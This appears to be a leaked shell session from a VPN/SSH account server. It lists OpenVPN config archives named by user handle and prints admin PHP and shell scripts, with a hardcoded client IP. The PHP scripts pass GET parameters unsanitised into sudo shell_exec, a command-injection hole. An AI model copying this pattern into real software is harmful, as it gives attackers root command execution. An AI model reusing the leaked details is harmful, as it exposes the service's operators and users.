20:41 bobby11515_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Aug 12 14:55 bobby15402_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Sep 17 03:28 bobby1638_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Dec 11 14:06 bobby7804_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Oct 18 18:37 cafe116337_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Aug 14 21:49 cardercarder18567_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Jul 7 2010 cardercarder21402_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Dec 12 19:16 cardercarder31297_OPENVPN.tgz -rw-r--r-- 1 root root 3588 Sep 14 07:54 cardercarder6893_OPENVPN.tgz -rw-r--r-- 1 root root 3585 Oct 28 02:05 cardercarder8070_OPENVPN.tgz -rw-r--r-- 1 root root 3416 Oct 15 01:29 carlos3914_OPENVPN.tgz -rw-r--r-- 1 root root 3564 Nov 23 05:29 cayenne10018_OPENVPN.tgz -rw-r--r-- 1 root root 3605 Jul 21 17:29 checka1220438_OPENVPN.tgz -rw-r--r-- 1 root root 3404 Dec 28 14:48 chessy33331564_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Sep 29 16:28 chessy3333215_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Nov 26 12:28 chiller133713287_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Dec 29 11:22 chiller13378063_OPENVPN.tgz -rw-r--r-- 1 root root 3409 Sep 10 00:34 chip998558_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Dec 7 09:16 conviction28712_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Oct 28 01:20 conviction6444_OPENVPN.tgz -rw-r--r-- 1 root root 3623 Jul 8 2010 coolio13949_OPENVPN.tgz -rw-r--r-- 1 root root 3575 Sep 5 22:43 crack9164_OPENVPN.tgz -rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh -rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh -rw-r--r-- 1 root root 3412 Jul 17 20:49 crypt012465_OPENVPN.tgz -rw-r--r-- 1 root root 3569 Oct 27 16:38 cryptus4764_OPENVPN.tgz -rw-r--r-- 1 root root 3598 Sep 11 19:15 cunit15618415_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Aug 11 14:44 cunit15619893_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Nov 9 23:03 cunit15624106_OPENVPN.tgz -rw-r--r-- 1 root root 3565 Jul 23 15:14 d0ne0ne32695_OPENVPN.tgz -rw-r--r-- 1 root root 3607 Dec 30 22:11 darkt0wn15874_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Nov 26 19:37 darkt0wn3662_OPENVPN.tgz -rw-r--r-- 1 root root 3423 Jun 11 2010 dasemih10582_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Aug 9 03:01 denniswolf15380_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Sep 8 17:06 denniswolf975_OPENVPN.tgz -rw-r--r-- 1 root root 3611 May 31 2010 desaster30502_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Jul 10 15:33 det0x10826_OPENVPN.tgz -rw-r--r-- 1 root root 3614 Jun 6 2010 det0x25144_OPENVPN.tgz -rw-r--r-- 1 root root 3607 May 16 2010 det0x6693_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Dec 5 20:40 dex9030410_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Aug 29 19:38 dinara3242_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Aug 18 17:42 docscanner11883_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Dec 10 20:19 docscanner15891_OPENVPN.tgz -rw-r--r-- 1 root root 3612 Oct 24 17:48 docscanner6161_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Oct 22 14:14 dome250310063_OPENVPN.tgz -rw-r--r-- 1 root root 3407 Aug 24 16:08 donkey17577_OPENVPN.tgz -rw-r--r-- 1 root root 3594 Nov 24 19:26 dpgc201011939_OPENVPN.tgz -rw-r--r-- 1 root root 3422 Nov 7 23:02 dreckz7739_OPENVPN.tgz -rw-r--r-- 1 root root 3605 Nov 22 18:25 drhandel18818_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Nov 27 11:04 drweed7100_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Nov 19 01:43 duden16363_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Oct 27 22:52 dudex20927_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Sep 12 18:50 dudex29255_OPENVPN.tgz -rw-r--r-- 1 root root 3439 Jun 1 2010 e5e1llo30858_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Nov 4 23:11 eater15817_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Oct 27 19:21 eddinc12916_OPENVPN.tgz -rw-r--r-- 1 root root 3581 Jan 3 15:05 elektro27327_OPENVPN.tgz -rw-r--r-- 1 root root 3560 Nov 30 15:30 elektro6996_OPENVPN.tgz -rw-r--r-- 1 root root 3585 Jul 15 00:05 elit327890_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Nov 18 12:14 epoepo25324_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Jul 14 20:26 f1resp1n9199_OPENVPN.tgz -rw-r--r-- 1 root root 3589 Nov 8 01:59 finnq10545_OPENVPN.tgz -rw-r--r-- 1 root root 3426 Oct 23 21:19 fluxay4913_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Sep 4 01:34 forza12423_OPENVPN.tgz -rw-r--r-- 1 root root 3599 Aug 24 21:30 fragezeichen14241_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Oct 5 16:36 fragezeichen3542_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Nov 26 23:39 frankylo18404_OPENVPN.tgz -rw-r--r-- 1 root root 3423 Nov 6 03:30 freaky11488_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Nov 29 12:11 freshestman14998_OPENVPN.tgz -rw-r--r-- 1 root root 3416 Sep 7 02:44 freshestman20055_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Oct 15 15:11 freshestman28233_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Nov 16 01:27 fuckdawn12660_OPENVPN.tgz -rw-r--r-- 1 root root 3417 Jul 20 01:30 galaxi12741_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Jul 19 22:52 galaxi15585_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Oct 2 23:53 galaxi18086_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Oct 30 02:40 gehtes5036_OPENVPN.tgz -rw-r--r-- 1 root root 3408 Oct 28 05:45 genetik1015054_OPENVPN.tgz -rw-r--r-- 1 root root 3606 Jun 8 2010 godfella23150_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Nov 3 00:53 ground22054_OPENVPN.tgz -rw-r--r-- 1 root root 3577 Sep 22 02:09 groundy30694_OPENVPN.tgz -rw-r--r-- 1 root root 3423 Aug 4 00:04 h2d2e218599_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Aug 6 19:39 h3l0x29397_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Jun 28 2010 h3l0x3097_OPENVPN.tgz -rw-r--r-- 1 root root 3612 May 27 2010 h3l0x31602_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Oct 16 21:20 h3l0x32259_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Sep 6 23:03 h3l0x4320_OPENVPN.tgz -rw-r--r-- 1 root root 3416 Dec 6 13:04 habadu5745_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Sep 22 11:39 hackbart231851_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Nov 13 22:57 hackbart24778_OPENVPN.tgz -rw-r--r-- 1 root root 3607 Oct 31 23:11 hackoman8853_OPENVPN.tgz -rw-r--r-- 1 root root 3592 Aug 18 15:47 haddemann1235295_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Jul 12 15:15 hallo12322143_OPENVPN.tgz -rw-r--r-- 1 root root 3416 Sep 4 01:51 hallo50505023476_OPENVPN.tgz -rw-r--r-- 1 root root 3596 Nov 28 20:53 hans200020336_OPENVPN.tgz -rw-r--r-- 1 root root 3407 Dec 4 19:35 hanshans12322721_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Sep 18 18:05 hanswurst4277_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Nov 20 14:42 hanswurst961_OPENVPN.tgz -rw-r--r-- 1 root root 3615 Nov 4 02:00 haooosii22019_OPENVPN.tgz -rw-r--r-- 1 root root 3628 Jul 8 2010 hasenp0wer1224_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Jul 12 16:53 hexst4tic15575_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Nov 6 17:30 hexst4tic20328_OPENVPN.tgz -rw-r--r-- 1 root root 3413 Sep 25 12:59 hexst4tic22131_OPENVPN.tgz -rw-r--r-- 1 root root 3391 Aug 23 16:21 hexst4tic24446_OPENVPN.tgz -rw-r--r-- 1 root root 3635 Jun 9 2010 hexst4tic31381_OPENVPN.tgz -rw-r--r-- 1 root root 3396 Jul 12 02:43 hexst4tic7086_OPENVPN.tgz -rw-r--r-- 1 root root 3396 Oct 26 02:49 heyhey12325893_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Jan 2 23:36 hi31757_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Dec 8 16:47 hung23046577_OPENVPN.tgz -rw-r--r-- 1 root root 3404 Oct 20 00:23 hushbaits3027_OPENVPN.tgz -rw-r--r-- 1 root root 3407 Dec 1 09:21 hushbaits8016_OPENVPN.tgz -rw-r--r-- 1 root root 3437 Jul 2 2010 ibrains20948_OPENVPN.tgz -rw-r--r-- 1 root root 3564 Nov 27 22:57 illegal9593_OPENVPN.tgz -rw-r--r-- 1 root root 3 May 11 2010 index.htm -rw-r--r-- 1 root root 2 Sep 17 03:05 index.html -rw-r--r-- 1 root root 3634 Jul 11 16:09 inexcussus16748_OPENVPN.tgz -rw-r--r-- 1 root root 3574 Jul 25 20:18 j9ker8731371_OPENVPN.tgz -rw-r--r-- 1 root root 3567 Oct 30 17:44 jack12330743_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Aug 5 00:16 jiansa17539_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Nov 25 20:03 johan12328730_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Jun 18 2010 johny3288_OPENVPN.tgz -rw-r--r-- 1 root root 3584 Aug 20 15:20 jokereloaded3875_OPENVPN.tgz -rw-r--r-- 1 root root 3607 May 11 2010 juden20060_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Nov 28 11:39 juegoray1353_OPENVPN.tgz -rw-r--r-- 1 root root 3408 Nov 9 17:01 juicestin20280_OPENVPN.tgz -rw-r--r-- 1 root root 3423 Nov 21 20:15 juliasutter2672_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Oct 24 18:42 kaiser6131_OPENVPN.tgz -rw-r--r-- 1 root root 3561 Jul 16 01:38 kaliber14521_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Dec 10 21:41 kalle4534_OPENVPN.tgz -rw-r--r-- 1 root root 3619 Jul 8 2010 kdkdkd23140_OPENVPN.tgz -rw-r--r-- 1 root root 3396 Dec 10 19:17 kevin4ual20601_OPENVPN.tgz -rw-r--r-- 1 root root 3614 May 17 2010 keystyle14572_OPENVPN.tgz -rw-r--r-- 1 root root 3397 Oct 22 02:19 kingding114185_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Dec 12 17:04 kingpok30006_OPENVPN.tgz -rw-r--r-- 1 root root 3577 Oct 19 14:30 kirmi16980_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Sep 10 11:50 kirmi17897_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Aug 3 12:32 kirmi21804_OPENVPN.tgz -rw-r--r-- 1 root root 3584 Dec 8 12:39 kirmi24669_OPENVPN.tgz -rw-r--r-- 1 root root 3394 Jul 19 15:09 kitanamea14934_OPENVPN.tgz -rw-r--r-- 1 root root 3564 Sep 13 20:16 klaudio18199_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Oct 13 23:44 knochen12287_OPENVPN.tgz -rw-r--r-- 1 root root 3581 Aug 26 17:50 kobra25894_OPENVPN.tgz -rw-r--r-- 1 root root 3584 Nov 11 19:06 kobra28854_OPENVPN.tgz -rw-r--r-- 1 root root 3401 Sep 2 22:18 koksi13379157_OPENVPN.tgz -rw-r--r-- 1 root root 3606 Sep 22 23:26 kollegah14227_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Nov 19 17:54 kollegah19696_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Jul 15 18:05 kollegah9876_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Jul 21 15:55 kopfnuss1233390_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Nov 30 09:05 kstARRR29974_OPENVPN.tgz -rw-r--r-- 1 root root 3416 Dec 15 15:22 lacezl11349_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Jul 15 14:07 lafesse135_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Jul 17 21:19 larusso24610_OPENVPN.tgz -rw-r--r-- 1 root root 3605 Dec 10 05:07 latestnews13082_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Oct 30 07:58 latestnews14060_OPENVPN.tgz -rw-r--r-- 1 root root 3418 May 15 2010 letharg30647_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Jul 20 01:31 levision22813_OPENVPN.tgz -rw-r--r-- 1 root root 3595 Jul 19 01:07 levision26609_OPENVPN.tgz drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd -rw-r--r-- 1 root root 3621 May 14 2010 lilg9427854_OPENVPN.tgz -rw-r--r-- 1 root root 3570 Jul 29 03:31 lolilol5992_OPENVPN.tgz -rw-r--r-- 1 root root 3589 Oct 1 00:06 loopi2628_OPENVPN.tgz -rw-r--r-- 1 root root 3599 Sep 5 22:47 lorenzstyler30043_OPENVPN.tgz -rw-r--r-- 1 root root 3588 Sep 9 15:14 lpboy15438_OPENVPN.tgz -rw-r--r-- 1 root root 3584 Nov 28 11:20 lpboy32147_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Dec 21 20:30 luden29299_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Jul 11 17:42 lykantos5842_OPENVPN.tgz -rw-r--r-- 1 root root 3605 Dec 2 11:04 mablutze15734_OPENVPN.tgz -rw-r--r-- 1 root root 3614 Jan 2 11:48 mablutze20061_OPENVPN.tgz -rw-r--r-- 1 root root 3618 Jul 2 2010 maddin9319817_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Nov 1 16:20 makko10328_OPENVPN.tgz -rw-r--r-- 1 root root 3585 Aug 13 22:07 makko15206_OPENVPN.tgz -rw-r--r-- 1 root root 3616 Jun 12 2010 makko27543_OPENVPN.tgz -rw-r--r-- 1 root root 3606 Dec 19 12:10 malakas23496_OPENVPN.tgz -rw-r--r-- 1 root root 3402 Oct 26 03:21 malakas32654_OPENVPN.tgz -rw-r--r-- 1 root root 3570 Dec 5 13:21 malikop20421_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Aug 8 02:15 mani199323876_OPENVPN.tgz -rw-r--r-- 1 root root 3577 Jul 13 00:29 maury27248_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Aug 20 18:57 mcott19555_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Oct 6 18:19 mcott7073_OPENVPN.tgz -rw-r--r-- 1 root root 3587 Jul 13 11:39 mcott9631_OPENVPN.tgz -rw-r--r-- 1 root root 3566 Aug 25 06:39 mesrine15658_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Oct 12 18:34 micki2219130_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Oct 4 19:37 mieze25868_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Jul 30 23:15 mrfranzi20317_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Jul 18 22:23 murth934_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Oct 17 04:31 muruk20094696_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Dec 17 13:08 muschigirl23085_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Sep 22 12:38 muschigirl28807_OPENVPN.tgz -rw-r--r-- 1 root root 3570 Oct 4 22:31 n1C3A1r22801_OPENVPN.tgz -rw-r--r-- 1 root root 3607 Nov 26 13:10 n3ot0xin7144_OPENVPN.tgz -rw-r--r-- 1 root root 3409 Dec 21 21:57 nate2331513_OPENVPN.tgz -rw-r--r-- 1 root root 3615 Jun 8 2010 navyraiser2256_OPENVPN.tgz -rw-r--r-- 1 root root 3585 Aug 25 00:32 nemiz8610_OPENVPN.tgz -rw-r--r-- 1 root root 3635 Jun 9 2010 nightmar330255_OPENVPN.tgz -rw-r--r-- 1 root root 3621 Jul 11 18:06 numo874898_OPENVPN.tgz -rw-r--r-- 1 root root 3592 Dec 2 14:11 obama12323355_OPENVPN.tgz -rw-r--r-- 1 root root 3613 Jun 11 2010 obama12325666_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Oct 15 20:31 obama12325914_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Dec 19 18:26 oicw913539_OPENVPN.tgz -rw-r--r-- 1 root root 3565 Aug 11 00:48 oxford123948_OPENVPN.tgz -rw-r--r-- 1 root root 3629 Jun 2 2010 p0rt3m22208_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Nov 5 01:41 pURRRR806_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Dec 6 07:28 pan1c17070_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Oct 26 10:28 pan1c31582_OPENVPN.tgz -rw-r--r-- 1 root root 3609 May 25 2010 pann021887_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Dec 7 22:03 papa421249_OPENVPN.tgz -rw-r--r-- 1 root root 3432 Jun 14 2010 paranoy21693_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Dec 1 18:16 peters7031_OPENVPN.tgz -rw-r--r-- 1 root root 3618 Jun 8 2010 plu5554340_OPENVPN.tgz -rw-r--r-- 1 root root 3613 Jun 15 2010 powerarm9390_OPENVPN.tgz -rw-r--r-- 1 root root 3408 Jul 16 00:19 puttin29618_OPENVPN.tgz -rw-r--r-- 1 root root 3575 Nov 22 18:53 r0fLyyy20540_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Jul 20 20:45 recoilcontrol13838_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Oct 31 05:55 recoilcontrol14436_OPENVPN.tgz -rw-r--r-- 1 root root 3605 Jul 20 23:48 recoilcontrol16539_OPENVPN.tgz -rw-r--r-- 1 root root 3589 Jul 20 20:45 recoilcontrol20256_OPENVPN.tgz -rw-r--r-- 1 root root 3595 Aug 24 23:41 recoilcontrol20435_OPENVPN.tgz -rw-r--r-- 1 root root 3595 Sep 25 22:59 recoilcontrol22600_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Dec 10 06:48 recoilcontrol24867_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Dec 7 12:24 reideen31055_OPENVPN.tgz -rw-r--r-- 1 root root 3565 Oct 27 16:49 reideen4694_OPENVPN.tgz -rw-r--r-- 1 root root 3429 Jun 13 2010 rew133711075_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Dec 4 15:25 rich9024721_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Dec 19 15:48 ripit25423_OPENVPN.tgz -rw-r--r-- 1 root root 3392 Sep 25 15:40 romulus8910580_OPENVPN.tgz -rw-r--r-- 1 root root 3606 Jun 5 2010 s1cks1ck7058_OPENVPN.tgz -rw-r--r-- 1 root root 3425 Jun 27 2010 saidone3692_OPENVPN.tgz -rw-r--r-- 1 root root 3432 Jul 10 10:52 santaly22171_OPENVPN.tgz -rw-r--r-- 1 root root 3428 May 12 2010 schmali30094_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Jul 5 2010 schmali8853_OPENVPN.tgz -rw-r--r-- 1 root root 3589 Nov 15 21:35 sh0ck11639_OPENVPN.tgz -rw-r--r-- 1 root root 3571 Nov 1 01:54 shitpro46_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Aug 26 22:09 shizomitzu29204_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Dec 3 09:02 shore17470_OPENVPN.tgz -rw-r--r-- 1 root root 3407 Dec 7 14:34 sidosido1233174_OPENVPN.tgz -rw-r--r-- 1 root root 3613 Jul 22 20:39 sirmaliq9030397_OPENVPN.tgz -rw-r--r-- 1 root root 3407 Dec 2 07:36 slic3menic38769_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Nov 10 22:47 snowghost17906_OPENVPN.tgz -rw-r--r-- 1 root root 3561 Nov 28 08:57 someone1895_OPENVPN.tgz -rw-r--r-- 1 root root 3434 Jun 25 2010 someone22369_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Aug 4 23:47 souliloquist11153_OPENVPN.tgz -rw-r--r-- 1 root root 3423 Jul 4 2010 souliloquist12695_OPENVPN.tgz -rw-r--r-- 1 root root 3594 Aug 4 23:48 souliloquist25034_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Nov 8 03:26 spran32726_OPENVPN.tgz -rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog -rw-r--r-- 1 root root 3579 Aug 15 01:11 st0ne24184_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Oct 31 00:13 stage666761_OPENVPN.tgz -rw-r--r-- 1 root root 3409 Aug 2 21:41 stevy265130526_OPENVPN.tgz -rw-r--r-- 1 root root 3568 Oct 14 22:12 store2410563_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Sep 7 14:57 stronger8718968_OPENVPN.tgz -rw-r--r-- 1 root root 3419 Oct 4 01:35 styler12729_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Nov 28 15:10 styles16225_OPENVPN.tgz -rw-r--r-- 1 root root 3424 Oct 18 07:43 styles18650_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Sep 29 17:37 suc4life19475_OPENVPN.tgz -rw-r--r-- 1 root root 3597 Aug 24 20:28 suc4life9834_OPENVPN.tgz -rw-r--r-- 1 root root 3625 Jun 20 2010 sudeki25957_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Dec 23 13:58 sunrise20870_OPENVPN.tgz -rw-r--r-- 1 root root 3401 Nov 29 12:31 supersixten16431_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Nov 8 19:05 t0xus32177_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Sep 2 23:25 t0xus6444_OPENVPN.tgz -rw-r--r-- 1 root root 3400 Nov 24 21:34 tahBOUNTY24202_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Nov 12 19:12 tanjo21492_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Sep 9 18:20 tanjo28945_OPENVPN.tgz -rw-r--r-- 1 root root 3564 Nov 27 10:06 termate24530_OPENVPN.tgz -rw-r--r-- 1 root root 4 Sep 16 23:51 test -rw-r--r-- 1 root root 3575 Dec 5 09:06 test5699246_OPENVPN.tgz -rw-r--r-- 1 root root 3587 Dec 29 19:18 teste8025_OPENVPN.tgz -rw-r--r-- 1 root root 3623 Jun 11 2010 th3sh4dow15637_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Aug 29 03:36 th3sh4dow26538_OPENVPN.tgz -rw-r--r-- 1 root root 3404 Jul 29 01:36 th3sh4dow7901_OPENVPN.tgz -rw-r--r-- 1 root root 3427 Nov 1 18:55 theDog31533_OPENVPN.tgz -rw-r--r-- 1 root root 3620 May 17 2010 theaSh5027_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Jan 3 20:24 thehen8300_OPENVPN.tgz -rw-r--r-- 1 root root 3401 Nov 29 06:13 tijgertje12595_OPENVPN.tgz -rw-r--r-- 1 root root 3608 May 13 2010 traden9010098_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Nov 8 02:41 tripit30242_OPENVPN.tgz -rw-r--r-- 1 root root 3612 Oct 21 03:49 turboprinz18543_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Oct 19 23:35 twist2275_OPENVPN.tgz -rw-r--r-- 1 root root 3430 May 31 2010 ucitsme12769_OPENVPN.tgz -rw-r--r-- 1 root root 3610 Nov 24 22:52 ultrawilli21542_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Oct 15 00:46 upperfreak1495_OPENVPN.tgz -rw-r--r-- 1 root root 3575 Jul 14 13:30 vpn2420339_OPENVPN.tgz -rw-r--r-- 1 root root 3580 Nov 3 20:57 vpn2429681_OPENVPN.tgz -rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog -rw-r--r-- 1 root root 3591 Nov 10 04:35 w333d21697_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Nov 6 03:41 w333d26767_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Oct 22 01:09 w333d31139_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Sep 22 02:05 w333d4383_OPENVPN.tgz -rw-r--r-- 1 root root 3599 May 11 2010 w333d8639_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Dec 4 09:33 w333d9676_OPENVPN.tgz -rw-r--r-- 1 root root 3620 Jun 11 2010 war10ck133710772_OPENVPN.tgz -rw-r--r-- 1 root root 3435 Aug 20 16:41 warmachine133724023_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Sep 3 04:18 weedneger31561_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Dec 5 08:42 weeman8818_OPENVPN.tgz -rw-r--r-- 1 root root 3433 Jun 16 2010 werther15618_OPENVPN.tgz -rw-r--r-- 1 root root 3591 Nov 23 19:41 winkel722094_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Aug 3 16:02 winkelmann725337_OPENVPN.tgz -rw-r--r-- 1 root root 3585 Aug 15 16:31 woorm6760_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Oct 23 04:28 wortermilk31260_OPENVPN.tgz -rw-r--r-- 1 root root 3597 Dec 13 19:34 wtfvpn2417141_OPENVPN.tgz -rw-r--r-- 1 root root 3419 Aug 27 04:03 ww2dd28375_OPENVPN.tgz -rw-r--r-- 1 root root 3580 Oct 15 16:33 x220x7914_OPENVPN.tgz -rw-r--r-- 1 root root 3567 Dec 16 07:03 xStream14196_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Nov 9 01:51 xStream25123_OPENVPN.tgz -rw-r--r-- 1 root root 3569 Sep 30 15:38 xStream27135_OPENVPN.tgz -rw-r--r-- 1 root root 3425 Jul 8 2010 xStream9518_OPENVPN.tgz -rw-r--r-- 1 root root 3575 Aug 18 03:10 xStream9635_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Sep 17 01:50 xeqtion7314_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Nov 27 14:45 xx1337xx4652_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Sep 9 21:16 xxkev200xx24744_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Jul 17 07:25 zer00063_OPENVPN.tgz -rw-r--r-- 1 root root 3638 May 15 2010 zetinator10057_OPENVPN.tgz # ls -la | grep -v tgz total 2388 drwxr-xr-x 3 root root 36864 Jan 4 20:32 . drwxr-xr-x 14 root root 4096 Feb 2 2010 .. -rw------- 1 root root 1024 Jan 4 20:17 .rnd -rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php -rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php -rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh -rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh -rw-r--r-- 1 root root 3 May 11 2010 index.htm -rw-r--r-- 1 root root 2 Sep 17 03:05 index.html drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd -rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog -rw-r--r-- 1 root root 4 Sep 16 23:51 test -rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog # #Warning: dumb code ahead # cat addSSHuser.php <?php if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); // visudo www-data ALL=NOPASSWD: /var/www/createSSHsocks.sh if(isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['date'])) { $user = $_GET['user']; $pass = $_GET['pass']; $date = $_GET['date']; echo shell_exec("sudo /var/www/createSSHsocks.sh $user $pass $date"); } ?> # cat createSSHsocks.sh #!/bin/sh if [ $# -lt 3 ] then echo $0 user pass expDate exit fi if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" then echo "Invalid User" exit fi if ! echo $2 | grep -q -e "^[a-zA-Z0-9]*$" then echo "Invalid Pass" exit fi if ! echo $3 | grep -q -E "[0-9]{4}-[0-9]{2}-[0-9]{2}" then echo "Invalid ExpDate" exit fi user=$1 pass=$2 exp=$3 echo "`date`: $user $pass $date" >> sshCreateLog if [ ! -d /home/SSHUSER ] then echo "Creating /home/SSHUSER" mkdir /home/SSHUSER fi crpass=$(perl -e"`echo \"print crypt(\\\"$pass\\\", \\\"itsMySalt\\\")\"`") deluser $user useradd --home /home/SSHUSER --expiredate $exp --password $crpass --shell /usr/sbin/nologin $user $ cat addVPNuser.php <?php if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); // visudo www-data ALL=NOPASSWD: /var/www/createVPN.sh if(isset($_GET['user'])) { $user = $_GET['user']; echo shell_exec("sudo /var/www/createVPN.sh $user 2> /dev/null"); } ?> # cat createVPN.sh 